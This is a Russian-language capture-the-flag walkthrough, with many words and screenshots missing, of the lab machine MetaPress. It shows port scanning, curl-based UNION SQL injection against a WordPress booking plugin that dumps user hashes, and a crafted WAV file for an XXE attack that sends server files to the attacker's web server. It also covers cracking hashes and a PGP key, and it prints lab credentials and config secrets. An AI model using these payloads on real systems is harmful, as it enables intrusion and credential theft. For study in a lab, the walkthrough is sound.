Приветствую,
! Сегодня пройдём легкую машину с
под названием
. Будет достаточно много текста, но зато всё максимально подробно
Разведка
Начинаем конечно же со сканирования портов. Используем флаг
, чтобы использовать стандартные скрипты,
, чтобы определить сервисы открытых портов и
, чтобы использовать
сканирование на основе полуоткрытых соединений (для этого мы также запускаем
с правами суперпользователя) и опцию
, чтобы сохранить сканирование в файле
:
Bash:
Код:
sudo
nmap -sC -sV -sS
10.10
.11.186 -oN nmap.out
Итак, у нас есть 3 порта:
-
,
-
,
-
.
- стандартный порт в
, который обычно используется после взятия пользователя/рута.
порт тоже достаточно популярный, как правило через него проходит первоначальная эксплуатация.
порт - это порт
Код:
FTP (File Transfer Protocol)
, через него мы можем выгружать и загружать файлы. Пробовал подключиться через
- не вышло.
Переходим на
порт -
:
Нам требуется добавить домен
в файл
, чтобы на него попасть. Для этого открываем данный файл через консольный редактор
с правами суперпользователя:
Bash:
Код:
sudo
nano
/etc/hosts
И пишем туда следующую строку:
Теперь доступ к сайту нам открыт:
По оформлению можно сразу сказать, что веб-сайт использует
. Перейдём на
Код:
http://metapress.htb/events/
. Очевидно, что тут используется какой-то плагин
:
Открываем исходный код страницы, жмём
и вбиваем
- самый быстрый способ найти плагины руками без автоматизации:
Как можно заметить - используется
версии
. Пробьём в гугле данный плагин:
Сразу же вылетают ссылки с
Код:
Unauthenticated SQL Injection
для данного плагина. Это то, что нам нужно, так как данных для админки
у нас нет. Вот показательный
Код:
PoC (Proof Of Concept)
данной уязвимости:
Согласно описанию эксплойта нам также потребуется
. Его мы можем найти в исходном коде страницы
через
Код:
action:'bookingpress_front_get_category_services'
:
Теперь меняем в
протокол, домен,
и отправляем наш первый запрос:
Bash:
Код:
curl
-i
'http://metapress.htb/wp-admin/admin-ajax.php'
--data
'action=bookingpress_front_get_category_services&_wpnonce=c4117c60cc&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
Исходя из этого можно сказать, что через 3 столбца мы можем выводить различную информацию с помощью
. Нам потребуется только один столбец. Начнём эксплуатацию стандартной
Код:
UNION-Based SQL-инъекции
. Для начала нужно узнать, какие есть базы данных. Используем
, чтобы сложить одно поле из разных строк (т. е. для полноценного вывода) и достаём названия БД из таблицы
базы данных
:
Bash:
Код:
curl
-i
'http://metapress.htb/wp-admin/admin-ajax.php'
--data
'action=bookingpress_front_get_category_services&_wpnonce=c4117c60cc&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(schema_name),null,null,1,2,3,4,5,6 from information_schema.schemata -- -'
Отлично, имеются две базы данных -
и
. Первая - системная, она нам понадобится только для того, чтобы узнать структуру второй (подробнее про
Вы можете прочитать тут).
Теперь нам нужно достать названия таблиц базы данных
:
Bash:
Код:
curl
-i
'http://metapress.htb/wp-admin/admin-ajax.php'
--data
"action=bookingpress_front_get_category_services&_wpnonce=c4117c60cc&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),null,null,1,2,3,4,5,6 from information_schema.tables where table_schema='blog' -- -"
На этом этапе возникли некоторые проблемы - запрос не проходит. И основная её причина находится в
Код:
where table_schema='blog'
. Данный момент мог сбить новичков с толку. Дело в том, что указывать названия таблиц/баз данных можно и без кавычек. Но в таком случае нужно использовать хекс.
Открываем
, переходим во вкладку
, пишем
. И выбираем метод энкода
:
Теперь вставляем данное значение в
Код:
table_schema=0x626c6f67
. Не забудьте вписать перед хексом
:
Bash:
Код:
curl
-i
'http://metapress.htb/wp-admin/admin-ajax.php'
--data
"action=bookingpress_front_get_category_services&_wpnonce=c4117c60cc&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),null,null,1,2,3,4,5,6 from information_schema.tables where table_schema=0x626c6f67 -- -"
Мы получили все таблицы, которые расположены в базе данных
. Теперь нужно получить все столбцы, которые расположены в той же базе данных и находятся в таблице
(стандартная таблица
, где хранятся данные о пользователях). Опять переходим в
и энкодим в хекс
:
В запросе указываем двойное условие, чтобы получить столбцы именно из таблицы
:
Bash:
Код:
curl
-i
'http://metapress.htb/wp-admin/admin-ajax.php'
--data
"action=bookingpress_front_get_category_services&_wpnonce=c4117c60cc&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(column_name),null,null,1,2,3,4,5,6 from information_schema.columns where table_schema=0x626c6f67 and table_name=0x77705f7573657273 -- -"
Из этого всего нам требуется только
и
:
Bash:
Код:
curl
-i
'http://metapress.htb/wp-admin/admin-ajax.php'
--data
"action=bookingpress_front_get_category_services&_wpnonce=c4117c60cc&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,user_pass),null,null,1,2,3,4,5,6 from wp_users -- -"
Получаем следующую строку:
Код:
admin$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.,manager$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70
Важно отметить, что символ
является экранирующим, поэтому в дальнейшем его нужно будет убрать. Хэш админа у меня не получилось сбрутить, но при этом хэш пользователя
дал результат:
Мы обладаем такими данными:
Код:
Код:
Имя пользователя: manager
Пароль: partylikearockstar
Переходим на
(стандартная страница авторизации
) и пробуем войти в аккаунт:
Авторизация прошла успешно:
Данный этап вызвал некоторые затруднения. Так как мы авторизовались, а вот что делать дальше - непонятно. Скорее всего нужно сканировать
на уязвимости. Используем
с
-токеном, который можно получить на wpscan.com после регистрации:
Bash:
Код:
wpscan --url http://metapress.htb --api-token
Находим следующую вулну -
, которая требует авторизации:
Делаем пэйлоад (
) согласно данной инструкции:
Код:
И поднимаем веб-сервер
на
порту:
Теперь генерируем вредоносный
-файл с пэйлоадом:
Bash:
Код:
echo
-en
'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;] >\x00'
>
exploit.wav
И загружаем его сюда:
После загрузки видим, что
(
) обращается к нашему веб-серверу с
-параметром
. В нём содержится
с атакуемой машины в
:
Код:
Код:
jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw==
Декодим через
:
Подтвердили, что уязвимость работает. Теперь давайте посмотрим, что содержится в конфиге
, чтобы определить в каком каталоге лежат файлы веб-сайта (о том, что используется
, мы узнали на этапе сканирования портов):
Код:
Корневым каталогом веб-сервера является
Код:
/var/www/metapress.htb/blog
:
Исходя из этого мы можем прочитать конфигурационный файл
-
:
Код:
В нём очень много данных:
PHP:
Код:
+3m?.B/:' );
define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY', 'J+mxCaP4zdd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );
/**
* WordPress Database Table prefix.
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
Всё, что нам понадобиться - это данные от
:
Код:
Код:
Имя: metapress.htb
Пароль: 9NYS_ii@FyL_p5M2NvJ
Подключаемся:
В
у нас есть доступ к двум каталогам -
и
. Каталог веб-сайта нам скорее всего не понадобится. Переходим в
и видим файл
. Качаем его на свою машину с помощью команды
:
В нём содержатся данные для пользователя
:
PHP:
Код:
SMTPDebug = 3;
$mail->isSMTP();
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;
$mail->From = "jnelson@metapress.htb";
$mail->FromName = "James Nelson";
$mail->addAddress("info@metapress.htb");
$mail->isHTML(true);
$mail->Subject = "Startup";
$mail->Body = "We just started our new blog metapress.htb!";
try {
$mail->send();
echo "Message has been sent successfully";
} catch (Exception $e) {
echo "Mailer Error: " . $mail->ErrorInfo;
}
Подключаемся по
:
Код:
Код:
Имя пользователя: jnelson
Пароль: Cb4_JmWM8zUZWMu@Ys
Взятие рута
Сразу же после подключения я обнаружил интересный скрытый каталог -
:
Тут мы можем обнаружить сообщения, где поле password зашифровано с помощью
:
А также публичные и приватные
-ключи (скрин не полный):
Имея приватный
-ключ, мы можем сбрутить пароль. Копируем содержимое ключа на нашу машину:
Используем
, чтобы привести ключ к формату для брутфорса и запускаем
со словарём
. Он часто используется в
и содержит более
паролей, которые ранее были раскрыты в результате утечки данных (скачать данный вордлист Вы можете тут):
Пароль успешно сбрутился. Теперь открываем любой сайт по дешифровке
и указываем сообщение, приватный ключ и пароль:
Получаем пароль суперпользователя -
и авторизуемся в качестве
:
Друзья, большое спасибо, что дочитали до конца! Надеюсь, что Вы извлекли для себя что-то новое из этой статьи. Пишите в комментариях, если я допустил ошибки/неточности
Линейный вид
